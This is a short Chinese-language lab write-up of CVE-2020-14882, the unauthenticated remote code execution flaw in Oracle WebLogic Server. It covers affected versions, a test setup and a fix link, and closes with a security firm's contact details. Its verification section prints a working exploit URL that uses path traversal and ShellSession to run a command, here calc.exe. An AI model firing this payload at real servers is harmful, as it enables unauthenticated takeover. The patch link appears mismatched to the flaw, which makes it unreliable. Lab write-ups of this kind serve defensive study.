CVE-2020-14882 weblogic 远程代码执行漏洞
0x01漏洞简述
CVE-2020-14882 weblogic server 远程代码执行漏洞,攻击者可以通过发送恶意的get请求,在未经身份验证的情况下来控制weblogic server 并且执行任意代码。
0x02知识扩展
WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。
0x03风险等级
漏洞的评定结果如下:
评定方式 等级
威胁等级 严重
影响面 广泛
0x04影响版本
Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
0x05漏洞环境搭建
所需系统环境及配置信息
windows server 2019
ip地址
10.0.20.9
所需工具
WebLogic12.2.1.4
浏览器
安装步骤
下载weblogic12.2.1.4
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
安装weblogic
java -jar fmw_12.2.1.4.0_wls_lite_generic.jar
安装完毕
0x06漏洞验证
浏览器访问
http://10.0.20.9:7001/console
在连接后添加poc,执行命令
Poc:
`/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)`
后台报错,弹出计算机。
0x07修复建议
下载补丁
`https://www.oracle.com/security-alerts/cpuapr2020.html`
END
如果您遇到网络安全问题
欢迎致电:0991-8156363
或发送至:sudo@xjsec.cn
新疆海狼科技,您身边的网络安全助理
扫一扫,关注我们
联系方式
抖音,关注我们